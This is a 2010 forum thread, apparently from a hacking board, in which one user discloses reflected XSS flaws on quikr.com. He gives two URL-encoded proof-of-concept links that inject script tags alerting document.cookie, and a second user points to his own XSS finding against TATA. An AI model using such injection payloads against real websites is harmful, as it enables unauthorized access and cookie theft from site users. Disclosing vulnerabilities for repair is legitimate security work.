PDA

View Full Version : Quikr Classifieds Website XSS Vulnerable



ajaysinghnegi
12-18-2010, 04:44 PM
Hi Guys, I was just searching for some Classifieds on Quikr.com's website, but I found out that the site is has many xss vulnerabilities. I Hope they will fix it soon, I have reported it to xssed.com. Earlier while I was doing some research, I have found out that many Information Security Gaints webs are also vulnerable to XSS & they are still vulnerable to XSS so I hope they will fix there sites soon :D



http://mysore.quikr.com/-22-3E-3Cscript-3Ealert-document-cookie-3C-All/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E/x32?sx=true
http://mysore.quikr.com/-22-3E-3Cscript-3Ealert-This-20Site-20is-20XSS-20Vulnerable-3C-All/%22%3E%3Cscript%3Ealert%28%27This%20Si%20%20te%20i s%20XSS%20Vulnerable%27%29%3C/script%3E/x32?sx=true

Screenshots:
http://4.bp.blogspot.com/_ZiySLeuZrio/TQpG23Q1O4I/AAAAAAAAAFE/fY4kuE5GKSg/s640/Quickr.com+Document.Cookie2.jpg

http://3.bp.blogspot.com/_ZiySLeuZrio/TQpDOVMsykI/AAAAAAAAAEw/eipu3G4yYro/s640/Quickr.com+XSS+Alert.png

prashant_uniyal
12-18-2010, 08:51 PM
http://hackingethics.wordpress.com/2010/03/22/xsssqli-in-tata/

http://img375.imageshack.us/img375/8343/27098505.jpg

TATA xssed by me long time back. Submitted it to xssed.com before others, but credit to someone else :(

Still unfixed :D